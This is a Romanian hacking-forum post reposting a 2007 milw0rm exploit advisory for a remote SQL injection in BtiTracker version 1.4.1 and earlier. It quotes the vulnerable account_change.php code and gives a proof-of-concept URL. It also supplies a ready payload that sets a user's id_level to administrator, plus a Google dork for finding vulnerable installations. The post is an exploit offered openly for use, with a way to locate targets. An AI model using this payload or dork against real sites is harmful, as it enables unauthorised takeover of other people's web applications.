Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
laura love Profile
 | Femeie
22 ani
Bihor
cauta Barbat
24 - 52 ani |
|
Hooligan
Old School Member
 Din: Zion
Inregistrat: acum 18 ani
Postari: 461
|
|
#################################################################################
#
# BtiTracker <=v1.4.1 Remote SQL Injection Exploit
#
# Discovered by: -
# Vulnerabitity: Remote Sql Injection /
# Problem: Any user can be Administrator
# Website Vendor:
#
# Vulnerable Code (account_change.php):
#
# if (isset($_GET["style"]))
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);
#
# if (isset($_GET["langue"]))
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);
#
# PoC: account_change.php?style=2[SQL]&returnto=%2F
#
# Example to gain admin control: account_change.php?style=1,id_level=8
#
#
# GoogleDork: "by Btiteam"
#
# Shoutz: - eVolVe or Die -
#
#################################################################################
# milw0rm.com [2007-05-22]
_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| pus acum 17 ani |
|